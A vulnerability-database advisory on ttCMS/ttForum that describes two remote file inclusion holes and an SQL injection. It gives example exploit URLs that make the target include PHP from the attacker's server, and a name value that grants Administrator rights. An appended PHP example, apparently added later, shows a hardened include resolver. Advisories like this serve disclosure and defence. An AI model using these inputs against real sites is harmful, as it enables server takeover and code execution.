ttcms and ttforum exploits

Vulnerability ID: 1052869
Vulnerability type: (not listed)
Published: 2007-10-23    Updated: 2007-10-23
CVE: CVE-2003-1458, CVE-2003-1459
CNNVD-ID: N/A
Platform: N/A    CVSS score: N/A
Source: https://cxsecurity.com/issue/WLB-2007100099
Details: vulnerability details have not been disclosed.
Exploit:


hope this is the right place to send this exploit info, I found three different exploits for a forum software / cms software:

------------------------------------------------------------------------

Affected Product: ttCMS or ttForum

Affected Versions: ttCMS 2.2 (possibly more), all versions of ttForum.

Description of exploit:

Open up modules/forum/News.php (ttCMS) or News.php (ttForum).

As you can see, this line:

include($template . '.' . $ext);

includes a file directly from the user input.

Here's an example exploit URL:

http://www.yourserver.com/ttforum/index.php?action=news;board=1;template=http://www.yourserver.com/modules/forum/helpadmin;ext=help

As you can see, it's possible to execute remote code using this hole.

Possible solutions:

Install YaBB SE 1.5.2. While ttForum is a derivative of YaBB SE, this hole does not exist there.

Upgrade to a newer version of ttForum/ttCMS that fixes the hole. (None is yet available.)

Use a different forum and/or CMS software.

------------------------------------------------------------------------

Affected Product: ttCMS or ttForum

Affected Versions: ttCMS 2.2 (possibly more), all versions of ttForum.

Description of exploit:

Open up modules/forum/src/Profile.php (ttCMS) or src/Profile.php (ttForum).

As you can see, this code:

foreach ($HTTP_POST_VARS as $key => $value) {
    // escapes &, ", < and > as HTML entities; a single quote passes through untouched
    $member[$key] = str_replace(array('&', '"', '<', '>'), array('&amp;', '&quot;', '&lt;', '&gt;'), trim($value));
}

parses out ", <, >, and &. It, however, does not parse out a SINGLE quote.

Now scroll down.

SET $queryPasswdPart $customTitlePart realName='$member[name]',

As you can see, simply setting your name to "me' memberGroup='Administrator" would make you an Administrator on any server that had magic_quotes_gpc off.

As you can see from the php.ini-recommended file:

; - magic_quotes_gpc = Off        [Performance]

They recommend it off, and thus a multitude of servers have it off, enabling this hole.

Possible solutions:

Install YaBB SE 1.5.2. While ttForum is a derivative of YaBB SE, this hole does not exist there.

Upgrade to a newer version of ttForum/ttCMS that fixes the hole. (None is yet available.)

Use a different forum and/or CMS software.

------------------------------------------------------------------------

Title:   ttForum / ttCMS, remote command execution.

Application:   ttForum up to 1.1, ttCMS 2.2

Platform(s):   Unix

Technical description:
----------------------

Everybody can inject PHP code in ttForum/ttCMS through the ttForum Installer. The Installer (which can be found in the /modules/forum directory in ttCMS) includes the Forum-Settings through include("$installdir/Settings.php") where $installdir is taken from a Form. In order to exploit this vulnerability, all you have to do is to create a File "Settings.php" on your own webserver which contains the code you want to execute on the target-system. If you now call the install.php-File with the following parameters: http://target-system/install.php?step=7&installdir=http://yourserver/ the code in Settings.php will be injected.

Recommendations:
----------------

Delete install.php AS SOON AS POSSIBLE or use YaBB SE 1.5.2 (ttForum is a derivative of YaBB SE)
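The request-controlled include behind the first and third advisories (a template name or $installdir passed straight to include()), shown next to a hardened resolver, as an added PHP example that is not ttCMS's or ttForum's own code; the template directory, the extension allow-list and the function names are assumptions.

```php
<?php
// Added example, not ttCMS/ttForum code; TEMPLATE_DIR, ALLOWED_EXTS and function names are assumed.
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';   // assumed template location
const ALLOWED_EXTS = ['php', 'html', 'help'];  // assumed extension allow-list

// Shape from the advisories: both halves of the path come straight from the request.
// With allow_url_fopen (or, from PHP 5.2, allow_url_include) on, a URL is fetched
// and run; even with it off, "../" still reaches local files.
function vulnerable_include(string $template, string $ext): void
{
    include($template . '.' . $ext);
}

// Hardened resolver: bare names only, extension from an allow-list, and the
// realpath() result must stay under TEMPLATE_DIR. Returns null on any failure.
// The same check fits the installer's include("$installdir/Settings.php").
function resolve_template(string $template, string $ext): ?string
{
    // No scheme, slash, dot or NUL byte can pass this pattern.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $template)) {
        return null;
    }
    if (!in_array($ext, ALLOWED_EXTS, true)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . DIRECTORY_SEPARATOR . $template . '.' . $ext);
    // realpath() is false for a missing file; the prefix test blocks symlink escapes.
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function safe_include(string $template, string $ext): bool
{
    $path = resolve_template($template, $ext);
    if ($path === null) {
        return false;   // caller logs the rejected value and serves a default template
    }
    include $path;
    return true;
}

// The advisory's payload shape and a traversal attempt both fail the name check
// before any filesystem access happens.
var_dump(resolve_template('http://www.yourserver.com/modules/forum/helpadmin', 'help'));
var_dump(resolve_template('../../../etc/passwd', 'php'));
```

The resolver only closes the include path itself; keeping allow_url_fopen/allow_url_include off and deleting install.php, as the advisories recommend, still matter.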